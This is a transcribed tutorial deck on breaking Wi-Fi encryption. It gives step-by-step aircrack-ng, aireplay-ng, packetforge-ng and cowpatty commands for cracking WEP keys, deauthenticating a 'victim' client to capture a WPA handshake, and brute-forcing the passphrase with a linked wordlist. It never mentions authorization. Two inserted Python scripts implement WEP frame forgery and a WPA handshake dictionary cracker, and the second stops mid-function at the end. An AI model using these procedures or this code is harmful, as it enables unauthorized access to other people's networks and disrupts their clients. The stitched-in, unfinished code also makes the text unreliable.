wireless encrypted networks

Upload: amitabh-joshi

Post on 09-Apr-2018


TRANSCRIPT

  • 8/7/2019 Wireless Encrypted Networks

    1/28

    Wireless Encrypted Networks

    By Zero Cold


    Index

    About WEP ... 3
    About WPA ... 4
    Tools used to crack Wi-Fi ... 5
    Things to know before cracking WPA/WEP ... 6
    Cracking WEP: Wesside-ng ... 7
    Cracking WEP: 0841 ... 10
    Cracking WEP: Chop Chop ... 14
    Cracking WPA with Airolib-ng & Cowpatty ... 20
    Cracking WPA with a Dictionary ... 25
    Things to remember when training ... 28


    WEP Encryption for Wireless Networks

    Wired Equivalent Privacy (WEP) is the original 802.11 security protocol; it encrypts transmitted frames with the RC4 stream cipher and is easy to configure. Without any security your data can be intercepted without difficulty.

    However, WEP was an early attempt to secure wireless networks, and better options are now available, such as WPA/WPA2 or running a VPN over the wireless link.

    WEP has three settings: Off (no security), 64-bit (weak security) and 128-bit (slightly better security). WEP is not difficult to crack, and using it reduces performance slightly.

    If you run a network with only the default security, where WEP is turned off, any of your neighbors can immediately connect to your network and use your Internet connection.

    For wireless devices to communicate, all of them must use the same WEP setting. (40-bit and 64-bit WEP are the same thing: a 40-bit secret key plus the 24-bit initialization vector (IV) that is sent in the clear with every frame. Likewise, 128-bit WEP is a 104-bit key plus the same 24-bit IV. 40-bit devices can communicate with 64-bit devices.)

    The longer key costs nothing extra to encrypt with, and both key sizes add the same per-frame overhead (a 4-byte IV/key-ID header and a 4-byte ICV), so there is no performance reason to prefer 64-bit. More importantly, 128-bit WEP is not much more difficult to crack than 64-bit: the attacks later in this guide recover either key size in minutes once enough IVs have been collected. If you are concerned about security, use WPA (preferably WPA2), which replaces WEP with a protocol for which no practical key-recovery attack is known; note that its pre-shared-key mode is only as strong as the passphrase you choose. There is a good overview in "What's New in Security: WPA (Wi-Fi Protected Access)".

    The WEP concept of a passphrase was introduced so that you do not have to enter complicated hex key strings by hand. The passphrase you enter is converted into the key(s); this conversion is vendor-specific rather than part of the standard, so choose passphrases with the same care you would important passwords.

    With 128-bit encryption, the passphrase generates one key. WEP supports up to four key slots (key index 0 to 3): every frame carries the index of the slot it was encrypted with, so all devices must hold the same keys in the same slots. Switching between slots does not make the traffic harder to break; the attacks below work on whichever key is in use.

    All devices within your LAN must use the same passphrases (i.e., the same keys).


    WPA Encryption for Wireless Networks

    Wi-Fi Protected Access (WPA and WPA2) is a certification program administered by the Wi-Fi Alliance to indicate compliance with the security protocol the Wi-Fi Alliance created to secure wireless computer networks. The protocol was created in response to several serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP). However, in 2008 researchers found a flaw that relied on older weaknesses to retrieve the keystream of short packets for re-injection and spoofing (the Tews/Beck attack described below). The protocol implements the majority of the IEEE 802.11i standard and was intended as an intermediate measure to take the place of WEP while 802.11i was prepared. Specifically, the Temporal Key Integrity Protocol (TKIP) was brought into WPA. TKIP could be implemented through firmware upgrades on pre-WPA wireless network interface cards that began shipping as far back as 1999. Because the changes required fewer modifications on the client than on the wireless access point, most pre-2003 APs could not be upgraded to support WPA with TKIP.

    The later WPA2 certification mark indicates compliance with an advanced protocol that implements the full

    standard. This advanced protocol will not work with some older network cards. Products that have successfully

    completed testing by the Wi-Fi Alliance for compliance with the protocol can bear the WPA certification mark.

    Pre-shared key mode (PSK, also known as Personal mode) is designed for home and small office networks that don't require the complexity of an 802.1X authentication server. Every device on the network derives its per-session keys from a shared 256-bit Pairwise Master Key (PMK). This key may be entered either as a string of 64 hexadecimal digits or as a passphrase of 8 to 63 printable ASCII characters. If a passphrase is used, the 256-bit key is calculated with PBKDF2: 4096 iterations of HMAC-SHA1, with the passphrase as the password and the SSID as the salt. Because the SSID is the salt, the same passphrase yields a different PMK on every differently named network, and a PMK table precomputed for one SSID is useless against another.

    Shared-key WPA is vulnerable to password cracking attacks if a weak passphrase is used. To protect against a brute force attack, a truly random passphrase of 13 characters (selected from the set of 95 permitted characters) is probably sufficient. Rainbow tables have been computed by the Church of WiFi for the top 1000 SSIDs and a million different WPA/WPA2 passphrases; because of the SSID salt these tables only apply to networks with exactly those names, so to further protect against intrusion the network's SSID should not match any entry in the top 1000 SSIDs.

    In August 2008 a post in the Nvidia CUDA forums announced the possibility of enhancing the performance of brute force attacks against WPA-PSK by a factor of 30 and more. The time-consuming PBKDF2 computation is moved from the CPU to a GPU, which can compute many passphrases and their corresponding pre-shared keys in parallel. The expected time to guess a common password with at least 50% probability shrinks to about 2-3 days. Some consumer chip manufacturers have attempted to bypass weak passphrase choice by adding a method of automatically generating and distributing strong keys through a software or hardware interface that uses an external method of adding a new wireless adapter or appliance to a network. The Wi-Fi Alliance has standardized these methods and certifies compliance with them through a program called Wi-Fi Protected Setup (formerly Simple Config).

    A weakness was uncovered in November 2008 by researchers at two German technical universities (TU Dresden and TU

    Darmstadt), Erik Tews and Martin Beck, which relied on a previously known flaw in WEP that could be exploited only

    for the TKIP algorithm in WPA and WPA2. The flaw can only decrypt short packets with mostly known contents, such as

    ARP messages, and 802.11e, which allows Quality of Service packet prioritization for voice calls and streaming media.

    The flaw does not lead to key recovery, but only a keystream that encrypted a particular packet, and which can be reused

    as many as seven times to inject arbitrary data of the same packet length to a wireless client. For example, this allows in-

    jecting faked ARP packets which make the victim send packets to the open Internet.


    Tools for Cracking WEP/WPA Networks

    Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and

    analysis tool for 802.11 wireless LANs. It works with any wireless card whose driver supports raw monitoring mode (for

    a list, visit the website of the project) and can sniff 802.11a, 802.11b and 802.11g traffic. The program runs under Linux

    and Windows; the Linux version has been ported to the Zaurus and Maemo platforms, and a proof-of-concept port has

    been made to the iPhone.

    In April 2007 a team at the Darmstadt University of Technology in Germany (Pyshkin, Tews and Weinmann) developed a new attack method building on a paper on the RC4 cipher by Andreas Klein. This new attack, named 'PTW', decreases the number of initialization vectors (IVs) needed to recover a WEP key and has been included in the aircrack-ng suite since the 0.9 release.

    Aircrack-ng is a fork of the original Aircrack project.

    Aircrack-ng     Cracks WEP (statistical/brute-force) and WPA/WPA2-PSK (dictionary) keys.
    Airdecap-ng     Decrypts WEP or WPA encrypted capture files with a known key.
    Airmon-ng       Places different cards in monitor mode.
    Aireplay-ng     Packet injector (Linux, and Windows with CommView drivers).
    Airodump-ng     Packet sniffer: places air traffic into PCAP or IVS files and shows information about networks.
    Airtun-ng       Virtual tunnel interface creator.
    Airolib-ng      Stores and manages ESSID and password lists and computes Pairwise Master Keys; increases the keys-per-second of WPA attacks.
    Packetforge-ng  Creates encrypted packets for injection.
    ivstools        Tools to merge and convert IV files.
    Airbase-ng      Incorporates techniques for attacking clients, as opposed to access points.
    Airdecloak-ng   Removes WEP cloaking from pcap files.
    Airdriver-ng    Tools for managing wireless drivers.
    Airserv-ng      Allows you to access the wireless card from other computers.
    Buddy-ng        The helper server for easside-ng, run on a remote computer.
    Easside-ng      Tool for communicating with an access point without the WEP key.
    Tkiptun-ng      WPA/TKIP attack.
    Wesside-ng      Automatic tool for recovering a WEP key.
    Cowpatty        Audits the WPA/WPA2 pre-shared key (PSK) from a captured handshake (a separate project, not part of aircrack-ng).


    Things to know before cracking WEP/WPA Network

    Basic service set identifier (BSSID)

    A related field is the BSSID or Basic Service Set Identifier, which uniquely identifies each BSS (the SSID, however, can be used in multiple, possibly overlapping, BSSs). In an infrastructure BSS, the BSSID is the MAC address of the wireless access point (WAP). In an IBSS, the BSSID is a locally administered MAC address generated from a 46-bit random number. The individual/group bit of the address is set to 0. The universal/local bit of the address is set to 1.

    A BSSID with a value of all 1s is used to indicate the broadcast BSSID. A broadcast BSSID may only be used during probe requests.

    Service Set identifier (SSID)

    Service set identifier, or SSID, is a name that identifies a particular 802.11 wireless LAN. A client device receives broad-

    cast messages from all access points within range advertising their SSIDs. The client device can then either manually or

    automatically, based on configuration, select the network with which to associate. The SSID can be up to 32 characters long. As the SSID displays to users, it normally consists of human-readable characters. However, the standard does not require this. The SSID is defined as a sequence of 1 to 32 octets, each of which may take any value.

    It is legitimate for multiple access points to share the same SSID if they provide access to the same network as part of an

    extended service set. Some wireless access points support broadcasting multiple SSIDs, allowing the creation of Virtual

    Access Points, partitioning a single physical access point into several virtual access points, each of which can have a dif-

    ferent set of security and network settings. This is not yet part of the 802.11 standard.

    MAC address (Mac)

    In computer networking, a Media Access Control address (MAC address) is a unique identifier assigned to most network

    adapters or network interface cards (NICs) by the manufacturer for identification, and used in the Media Access Control

    protocol sub layer. If assigned by the manufacturer, a MAC address usually encodes the manufacturer's registered identi-

    fication number. It may also be known as an Ethernet Hardware Address (EHA), hardware address, adapter address, or

    physical address.

    There are three numbering spaces, managed by the Institute of Electrical and Electronics Engineers (IEEE), which are in

    common use for formulating a MAC address: MAC-48, EUI-48, and EUI-64. The IEEE claims trademarks on the names

    "EUI-48" and "EUI-64", where "EUI" stands for Extended Unique Identifier.

    Although intended to be a permanent and globally unique identification, it is possible to change the MAC address on most

    of today's hardware, an action often referred to as MAC spoofing. Unlike IP address spoofing, where a sender spoofing

    their address in a request tricks the other party into sending the response elsewhere, in MAC address spoofing (which

    takes place only within a local area network), the response is received by the spoofing party.

    A host cannot determine from the MAC address of another host whether that host is on the same OSI Layer 2 network

    segment as the sending host, or on a network segment bridged to that network segment. In TCP/IP networks, the MAC

    address of a subnet interface can be queried with the IP address using the Address Resolution Protocol (ARP) for Internet

    Protocol Version 4 (IPv4) or the Neighbor Discovery Protocol (NDP) for IPv6. On broadcast networks, such as Ethernet,

    the MAC address uniquely identifies each node and allows frames to be marked for specific hosts. It thus forms the basis

    of most of the Link layer (OSI Layer 2) networking upon which upper layer protocols rely to produce complex, function-

    ing networks.


    Crack WEP with Wesside-ng Attack

    Before cracking WEP with wesside-ng you will need your wireless interface name. You can find this by opening a shell and typing the following command (your device name may be different):

    airmon-ng

    You should see a list of interfaces like the one below.

    Now that you have your wireless interface name, put the card into monitor mode by typing:

    airmon-ng start wlan0


    Note: the image above may look different; if it says "monitor mode enabled on mon0", use mon0 as your device name. Now that your card is in monitor mode we can start airodump-ng to get the BSSID, so type airodump-ng followed by your device name, for example:

    airodump-ng mon0

    Note: the encryption above is WPA, but I changed it to WEP for making this tutorial; I changed the encryption type before taking the image. If you would like to crack WPA/WPA2, please go further down the page for that. Now that you have the BSSID from airodump-ng you can start with wesside-ng. Open a new shell, or press Ctrl-C to kill airodump-ng, and enter the next few commands:

    wesside-ng -h


    Please take note of these options; they are always handy for cracking a network fast and easily, because this is a one-line command tool. The other ways of cracking networks that I will show you take more than one line; this is the most simple and automated tool for cracking networks that I know of at this time. The next step is to choose your options (mine may be different). I have chosen to attack a network using 64-bit encryption for this tutorial, so here we go (your device name may be different):

    wesside-ng -i mon0 -v 00:23:4E:BC:3A:AB -k 3

    -i Your monitor-mode interface -v The victim AP's BSSID -k Ignore ACKs and transmit each frame this many times

    The reason I am using -k 3 is that I get a packet collection error; it is something to do with my wireless card. If you get an error, try using -k 3 or -k 1; this is used for distance errors.

    Notice it collecting IVs: the 24-bit initialization vector that is sent in the clear at the start of every WEP frame. Once it has captured enough IVs it can recover the key. Also see it capturing from a computer on the network; the MAC address 00:1F:9F:AA:B0:4C is the address of the victim's machine, which is using the Internet. Once it has collected enough IVs it will automatically crack the key, as below.


    Cracking WEP 0841 Attack

    Before cracking WEP with the 0841 method you will need your wireless interface name. You can find this by opening a shell and typing:

    airmon-ng

    Now that you have your wireless interface name, put the card into monitor mode by typing (your device name may be different):

    airmon-ng start wlan0

    Now that the device is in monitor mode you need to scan with airodump-ng:

    airodump-ng mon0


    With airodump-ng running as above, note down the BSSID and the channel number; both are needed for this attack. Once you have them, press Ctrl-C to stop it and restart airodump-ng locked to that channel and BSSID (your device name may be different):

    airodump-ng -w wep -c 1 --bssid 00:23:4E:BC:3A:AB mon0

    --bssid The victim AP's MAC address (BSSID) -c The channel number of the router -w The prefix of the output file

    Please keep airodump-ng running with these settings so that it collects packets into the wep-01.cap file for cracking later, after we have entered a few more commands.

    Now that our card is in monitor mode and collecting packets, we start by making a fake authentication with the victim access point. You can do this by typing:

    aireplay-ng -1 3 -a 00:23:4E:BC:3A:AB -h 00:1F:1F:14:4D:6B mon0

    -1 Fake authentication
    3 Delay in seconds between re-authentications (0 authenticates once) -a The victim AP's BSSID -h Your MAC address (it must be the address actually on the injecting interface, or the AP will not accept frames from it)

    To set your MAC address to a known value I found the best way is the following command (the interface must be down while you change it):

    macchanger --mac 00:11:22:33:44:55 wlan0


    As you can see below, it has authenticated enough to get an IV packet, but it needs more, so I have set it to 3 to get more packets; if the network is running 128-bit encryption it may need more. Now you need to make sure the traffic is going to be collected into the cap file, which we do with the next step:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:23:4E:BC:3A:AB -h 00:1F:1F:14:4D:6B mon0

    -2 Interactive frame selection (replay) -p Set the frame control word (hex): 0841 marks the frame as a protected data frame to the distribution system (ToDS), so the AP re-encrypts and relays it, producing a fresh IV each time -c Set the destination MAC address (the broadcast address, so the AP always relays it) -b The victim AP's BSSID -h Your MAC address


    As you can see, it is capturing packets into the cap file that airodump-ng created. Now that the packets are being captured you can start aircrack-ng by opening a new shell and typing:

    aircrack-ng wep*.cap

    wep*.cap The file(s) we are collecting IV packets into

    The reason for the * is that if you have run airodump-ng more than once with the same -w prefix it creates a new file each time (wep-01.cap, wep-02.cap and so on); the wildcard makes aircrack-ng read every matching capture file in the current directory.

    Aircrack-ng retries the key at intervals as IVs accumulate: it first attempts the crack at 5000 IVs, then again at 10000, and so on. If it does not crack the key straight away, don't worry; with the PTW attack a 64-bit key typically falls with a few tens of thousands of IVs and a 128-bit key needs more, so it may take a little time depending on the key length.


    Cracking WEP Chop Chop Attack

    Before cracking WEP with the Chop Chop attack you will need your wireless interface name. You can find this by opening a shell and typing:

    airmon-ng

    Now that you have your wireless interface name, put the card into monitor mode by typing (your device name may be different):

    airmon-ng start wlan0


    You now need to run airodump-ng to get the BSSID and channel number of the victim's router, and then lock on to them (your device name may be different):

    airodump-ng -w wep -c 1 --bssid 00:23:4E:BC:3A:AB mon0

    -w Prefix of the output file -c Channel number --bssid The victim AP's BSSID

    Now you need to make a fake authentication with the victim's router. You can do this by typing the following command (your BSSID, MAC address and device name will differ from mine):

    aireplay-ng -1 0 -a 00:23:4E:BC:3A:AB -h 00:1F:1F:14:4D:6B mon0

    -1 Fake authentication; the 0 means authenticate once (a non-zero value re-authenticates every that many seconds) -a The victim AP's BSSID -h Your MAC address


    Now that you have successfully authenticated, you need to recover a keystream (the .xor file) with the chopchop attack in aireplay-ng. You can do this by typing (your device name may be different):

    aireplay-ng -4 -b 00:23:4E:BC:3A:AB -h 00:1F:1F:14:4D:6B mon0

    -4 Chopchop WEP packet -b The victim AP's BSSID -h Your MAC address


    Chopchop picks a captured data frame (answer y when it asks whether to use the packet) and recovers its plaintext one byte at a time, by chopping off the last byte and replaying a corrected frame until the AP accepts it. When it finishes it writes the decrypted packet and the recovered keystream (PRGA) to replay_dec-*.cap and replay_dec-*.xor, as the image below shows.

    Now that we have the keystream saved to a file, the next step is to build an ARP request with packetforge-ng, encrypted with that keystream:

    packetforge-ng -0 -a 00:23:4E:BC:3A:AB -h 00:1F:1F:14:4D:6B -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1126-112243.xor -w arp-request

    -0 Forge an ARP packet -a The victim AP's BSSID -h Your MAC address -k Set destination IP address -l Set source IP address -y Read PRGA from this file (the .xor file created by aireplay-ng -4) -w Write the packet to this pcap file


    The next step is to inject the ARP request you created with packetforge-ng. The AP relays each copy with a new IV, so the IV count in airodump-ng climbs quickly. Use aireplay-ng (your device name may be different):

    aireplay-ng -2 -r arp-request mon0

    Info:

    -2 Interactive frame selection (injection) -r Read the packet to inject from this file (the one created with packetforge-ng)


    All that is left to do now is open a new shell and type:

    aircrack-ng -P 2 wep*.cap

    -P 2 A PTW debug option selecting the PTW attack (PTW is aircrack-ng's default since 1.0, so a plain aircrack-ng wep*.cap does the same) wep*.cap The file(s) we are collecting IVs into

    The reason for the * is that if you have run airodump-ng more than once with the same -w prefix it creates a new file each time (wep-01.cap, wep-02.cap and so on); the wildcard makes aircrack-ng read every matching capture file in the current directory.

    As you can see above, aircrack-ng has cracked the wireless key and decrypted it fully. All you need to do now is take out the colons and enter the hex key to connect to the victim's router.

    Aircrack-ng retries the key at intervals as IVs accumulate (5000, then 10000, and so on), so if it does not crack the key straight away, leave the injection running; it may take a little time depending on the key length.
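    The chopchop, packetforge-ng and injection steps above work because WEP reuses a single RC4 keystream for a given IV and its integrity check (ICV) is a plain CRC32. The Python script below is an added example written for this edit, not code from the guide or from the aircrack-ng project. It uses a constructed 40-bit key, IV and ARP payload to recover a keystream from one known-plaintext frame (the same bytes chopchop writes to the .xor file) and then forges a different frame with a valid ICV that the receiver accepts, without the attacker ever learning the key. The RC4 and CRC32 parts are exact; the 802.11 frame headers are left out.

```python
"""WEP keystream reuse: recover a keystream from one frame, forge another (added example)."""
import struct
import zlib
from typing import Optional, Tuple


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream (KSA + PRGA), no drop-n, exactly as WEP uses it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _icv(data: bytes) -> bytes:
    """WEP ICV: little-endian CRC32 of the plaintext (linear, hence forgeable)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV || keyid(0) || RC4(IV||key)(plaintext || ICV). key is 5 (64-bit) or 13 (128-bit) bytes."""
    ks = rc4(iv + key, len(plaintext) + 4)
    body = bytes(a ^ b for a, b in zip(plaintext + _icv(plaintext), ks))
    return iv + b"\x00" + body


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """What the AP does: strip IV, decrypt, verify ICV. Returns plaintext, or None on ICV failure."""
    iv, body = frame[:3], frame[4:]
    dec = bytes(a ^ b for a, b in zip(body, rc4(iv + key, len(body))))
    plaintext, icv = dec[:-4], dec[-4:]
    return plaintext if _icv(plaintext) == icv else None


# ---- attacker side: no key needed from here on ----

def recover_keystream(frame: bytes, known_plaintext: bytes) -> Tuple[bytes, bytes]:
    """Known-plaintext recovery of (IV, keystream) = ciphertext XOR (plaintext || ICV).
    This is the content of the replay_dec-*.xor file; chopchop recovers the same bytes one at a time."""
    iv, body = frame[:3], frame[4:]
    ks = bytes(a ^ b for a, b in zip(body, known_plaintext + _icv(known_plaintext)))
    return iv, ks


def forge_frame(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """packetforge-ng's trick: encrypt attacker-chosen data (up to len(keystream)-4 bytes) under a reused IV."""
    need = len(new_plaintext) + 4
    if need > len(keystream):
        raise ValueError("not enough recovered keystream for a frame this long")
    body = bytes(a ^ b for a, b in zip(new_plaintext + _icv(new_plaintext), keystream[:need]))
    return iv + b"\x00" + body


def demo() -> Optional[bytes]:
    wep_key = bytes.fromhex("0123456789")  # constructed 40-bit key; the attacker never sees it
    iv = b"\x11\x22\x33"
    # Constructed ARP request: LLC/SNAP header + fixed ARP fields, then 20 bytes of addresses.
    # ARP is the favourite known-plaintext target because these header bytes are predictable.
    arp = bytes.fromhex("aaaa0300000008060001080006040001") + b"\x00" * 20
    sniffed = wep_encrypt(wep_key, iv, arp)              # what airodump-ng would capture
    iv_r, ks = recover_keystream(sniffed, arp)            # what ends up in the .xor file
    forged = forge_frame(iv_r, ks, b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"ATTACKER-CHOSEN-ARP")
    return wep_decrypt(wep_key, forged)                   # the AP accepts it: ICV verifies
```

    Run demo() and the receiver hands back the attacker's plaintext with a valid ICV, which is why a single .xor file is enough for packetforge-ng to build injectable ARP requests: the AP relays each one under a new IV, and those IVs are what aircrack-ng needs.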


    Cracking WPA with Airolib-ng & Cowpatty

    This tutorial shows you how to crack WPA and WPA2 networks with airolib-ng and cowpatty.

    Cowpatty tests candidate passphrases against a four-way handshake in a pcap file captured by airodump-ng; airolib-ng precomputes the Pairwise Master Key for each ESSID/passphrase pair so that cowpatty only has to do the cheap part of the check.

    Before we use cowpatty you need to capture a four-way handshake. The problem with cracking WPA is that to get a handshake you need a victim client to deauthenticate, so that it reconnects and you capture the handshake; this can be done in multiple ways.

    Before you start, as in the tutorials above, put your card into monitor mode by typing (your device name may be different):

    airmon-ng start wlan0

    Now that your card is in monitor mode, use airodump-ng to find the victim's BSSID, ESSID and channel number. Once you have them, press Ctrl-C and use the following command:

    airodump-ng -w WPA -c 1 --bssid 00:23:4E:BC:3A:AB mon0

    -w The prefix of the output file -c The channel number --bssid The victim AP's BSSID


    Next you will need to deauthenticate a victim on the network (in other words, boot him or her off) so that airodump-ng captures a four-way handshake on reconnection. This can be done with the following command (your device name may be different):

    aireplay-ng -0 1 -a 00:23:4E:BC:3A:AB -c 00:23:4D:11:87:D5 mon0

    Info:

    -0 Deauthentication attack

    1 The number of deauthentication bursts to send (0 sends them continuously)

    -a The victim AP's BSSID -c The MAC address of the victim's machine

    As you can see in the image above, I have successfully deauthenticated the victim's machine on the network to capture a four-way handshake. To know whether you have it, look at the top right of the airodump-ng window, which shows "WPA handshake: <BSSID>" once one has been captured.


    Once you have your four-way handshake you need to create a database for cowpatty to read. You can do this with airolib-ng:

    airolib-ng pskdb --import passwd /root/password.txt

    pskdb The name of the database to be created --import passwd Imports a password list /root/password.txt The location of the password list

    Here is the output I got when I imported the passwords.

    Now that the database is created you need to import ESSIDs. Create a text file with one ESSID per line; I have chosen to call mine essid.txt, but yours can be different (remember that if you rename your text file the name in the command line changes too). You may want to place it in your root directory to save typing paths. To import your essid.txt file, enter the following in your shell:

    airolib-ng pskdb --import essid essid.txt

    Your output should look like below:

    root@root~# airolib-ng pskdb --import essid essid.txt
    Reading file...
    Writing...
    Done.
    root@root~#

    The next step is to batch the database, which computes the PMK for every ESSID/password pair so it is ready for use in cowpatty:

    airolib-ng pskdb --batch


    This may take a little time depending on the size of your wordlist. For this guide I am using a small wordlist that consists of approximately 1805 passwords, but you will want a much larger one; I have posted a 64-million-word one on the forums. If you would like to download it, go here: http://www.megaupload.com/?d=7RN6ZB2E

    Once everything is batched up and ready to go, let's check that it went to plan with airolib-ng:

    airolib-ng pskdb --stats

    Here is my output.


    Now that we have all the required information in our database, we can export it to a file that cowpatty can read:

    airolib-ng pskdb --export cowpatty BTHomeHub2-S5JW out

    Remember to change the ESSID to the one you have in your list and in your database. If all has gone to plan it should look like below:

    root@root~# airolib-ng pskdb --export cowpatty BTHomeHub2-S5JW out
    Exporting...
    Done.
    root@root~#

    You should now have a file called out in your home folder. Let's recap to check that everything has been done correctly.

    We started by putting our card into monitor mode, then ran airodump-ng to collect the BSSID, ESSID and channel number. We closed airodump-ng and re-ran it with our settings, locked on a set channel and BSSID and writing a pcap file. We then deauthenticated a victim on the network to collect the four-way handshake, which was stored in the pcap file. Finally we created a cowpatty hash file using airolib-ng, ready for cracking with cowpatty, which is what we do now:

    cowpatty -s BTHomeHub2-S5JW -d out -r WPA-01.cap

    -s The victim's ESSID -d The hash file you exported with airolib-ng -r The pcap file created by airodump-ng

    Please note: if you get errors like "file not found", give the full paths of the files, for example /root/out


    Cracking WPA with a Dictionary

    This tutorial shows you how to crack WPA and WPA2 networks with aircrack-ng and a dictionary list.

    This is a little different from using airolib-ng and cowpatty: it is slower, because aircrack-ng computes the PMK for every candidate at crack time, but you do not have to type as many commands or wait for the database to batch; it is almost a straightforward brute-force attack. Like before, you will need to get a four-way handshake, and the problem with that is that you need a victim client to deauthenticate so that you capture the handshake when it reconnects; this can be done in multiple ways.

    Before you start, as in the tutorials above, put your card into monitor mode by typing (your device name may be different):

    airmon-ng start wlan0

    Now that your card is in monitor mode, use airodump-ng to find the victim's BSSID, ESSID and channel number. Once you have them, press Ctrl-C and use the following command:

    airodump-ng -w WPA -c 1 --bssid 00:23:4E:BC:3A:AB mon0

    -w The prefix of the output file -c The channel number --bssid The victim AP's BSSID


    Next you will need to deauthenticate a victim on the network (in other words, boot him or her off) so that airodump-ng captures a four-way handshake on reconnection. This can be done with the following command (your device name may be different):

    aireplay-ng -0 1 -a 00:23:4E:BC:3A:AB -c 00:23:4D:11:87:D5 mon0

    Info:

    -0 Deauthentication attack

    1 The number of deauthentication bursts to send (0 sends them continuously)

    -a The victim AP's BSSID -c The MAC address of the victim's machine


    As you can see in the image above, I have successfully deauthenticated the victim's machine on the network to capture a four-way handshake. To know whether you have it, look at the top right of the airodump-ng window, which shows "WPA handshake: <BSSID>" once one has been captured.

    Now that you have a four-way handshake you can start cracking with aircrack-ng and your dictionary list. If you need a dictionary list there is one posted on the forums; here is the link: http://www.megaupload.com/?d=7RN6ZB2E

    Using aircrack-ng with a dictionary is simple once you remember the command; here is how to do it:

    aircrack-ng -w password.txt WPA-01.cap

    -w Your dictionary file WPA-01.cap Your capture file (the file created with airodump-ng)

    Here is my output.
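    What airolib-ng/cowpatty and aircrack-ng -w actually compute, for the PBKDF2 derivation described in the WPA section and for the two WPA cracking procedures above: the Python script below is an added example written for this edit, not code from the guide, from the aircrack-ng project or from cowpatty. For each candidate passphrase it derives the PMK (PBKDF2-HMAC-SHA1 over the SSID), the PTK (802.11i PRF over both MAC addresses and both nonces) and the EAPOL MIC of handshake message 2, and compares that MIC with the captured one. The handshake it cracks is constructed inline: the guide's AP and client addresses, a made-up passphrase and fixed nonces; the key derivation itself is the real one (the PMK function is checked against the IEEE 802.11i test vector for passphrase "password" and SSID "IEEE").

```python
"""WPA/WPA2-PSK dictionary attack on a four-way handshake (added example)."""
import hashlib
import hmac
import struct
from typing import Dict, Iterable, Optional

# EAPOL hdr(4) + descriptor type(1) + key info(2) + key length(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK derivation: 4096 rounds of PBKDF2-HMAC-SHA1, 256-bit output, SSID as salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenation of HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (WPA/TKIP): HMAC-MD5; version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if key_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, key_version: int = 2, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (constructed; a real frame also carries an RSN IE in the key data)."""
    key_info = 0x0108 | key_version  # bit 8 = MIC present, bit 3 = pairwise, bits 0-2 = descriptor version
    body = struct.pack(">BHH", 2, key_info, 16) + b"\x00" * 8   # type 2 (RSN), key info, key length, replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + struct.pack(">H", 0)
    return struct.pack(">BBH", 1, 3, len(body)) + body           # EAPOL v1, type 3 (Key), length


def precompute_pmks(ssid: str, wordlist: Iterable[str]) -> Dict[str, bytes]:
    """The expensive step airolib-ng --batch does once per (ESSID, passphrase) pair."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


def crack_handshake(pmk_table: Dict[str, bytes], ap_mac: bytes, sta_mac: bytes,
                    anonce: bytes, snonce: bytes, eapol: bytes) -> Optional[str]:
    """The cheap per-handshake check cowpatty -d / aircrack-ng -w run against each candidate PMK."""
    key_version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for passphrase, pmk in pmk_table.items():
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]   # KCK = first 128 bits of PTK
        if hmac.compare_digest(eapol_mic(kck, eapol, key_version), captured_mic):
            return passphrase
    return None


def demo() -> Optional[str]:
    # Constructed handshake: the guide's AP/client MACs, a made-up passphrase, fixed nonces.
    ssid, secret = "BTHomeHub2-S5JW", "sunflower7"
    ap_mac, sta_mac = bytes.fromhex("00234EBC3AAB"), bytes.fromhex("00234D1187D5")
    anonce = hashlib.sha256(b"anonce").digest()   # real nonces are random per handshake
    snonce = hashlib.sha256(b"snonce").digest()
    kck = ptk_from_pmk(pmk_from_passphrase(secret, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_eapol_msg2(snonce, mic=eapol_mic(kck, build_eapol_msg2(snonce), 2))  # client's real MIC
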